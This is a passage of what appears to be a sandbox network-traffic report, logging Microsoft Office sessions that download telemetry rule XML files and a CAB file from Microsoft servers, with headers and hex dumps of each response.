                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Expires: -1
                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                          MS-CorrelationId: cf6e74fe-1957-47e9-9fda-718643b56410
                                                                                                                                                                          MS-RequestId: 7851074c-e0d7-4593-89b4-8aec3b915933
                                                                                                                                                                          MS-CV: otHzxmX3GEijfQOq.0
                                                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:03 GMT
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 30005
                                                                                                                                                                          2024-11-23 18:02:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                          2024-11-23 18:02:04 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          92192.168.2.54983613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:04 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:04 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 958
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                          ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                          x-ms-request-id: 4857c71c-401e-0067-7e3a-3c09c2000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180204Z-15b8b599d889gj5whC1TEBfyk0000000031g00000000fvme
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:04 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          93192.168.2.54983813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:04 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:04 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1952
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                          ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                          x-ms-request-id: df4f394c-601e-0002-2a39-3ca786000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180204Z-178bfbc474bxkclvhC1NYC69g400000004ug0000000030nq
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:04 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          94192.168.2.54983713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:04 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:04 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 501
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                          ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                          x-ms-request-id: 18f8ca6a-701e-005c-1e55-3dbb94000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180204Z-174c587ffdfb485jhC1TEBmc1s000000032g00000000earv
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:04 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          95192.168.2.54983913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:04 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:04 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 2592
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                          ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                          x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180204Z-178bfbc474b9fdhphC1NYCac0n00000004tg000000004748
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:05 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          96192.168.2.54984013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:04 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:05 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 3342
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                          ETag: "0x8DC582B927E47E9"
                                                                                                                                                                          x-ms-request-id: abaf503b-901e-0064-2b47-3ce8a6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180205Z-178bfbc474bw8bwphC1NYC38b400000004ng000000009zuf
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:05 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          97192.168.2.54985413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:06 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:06 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 2284
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                          ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                          x-ms-request-id: 0cd55988-601e-003e-4d0c-3d3248000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180206Z-178bfbc474bbbqrhhC1NYCvw7400000004wg00000000gqc5
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:07 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          98192.168.2.54985613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:06 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:07 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1393
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                          ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                          x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180207Z-174c587ffdfcb7qhhC1TEB3x70000000037000000000tsys
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:07 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          99192.168.2.54985713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:07 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:07 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1356
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                          ETag: "0x8DC582BDC681E17"
                                                                                                                                                                          x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180207Z-174c587ffdf8lw6dhC1TEBkgs8000000034g00000000ta03
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          100192.168.2.54985813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:07 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:07 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1393
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                          ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                          x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180207Z-178bfbc474bv587zhC1NYCny5w00000004q0000000008xw2
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
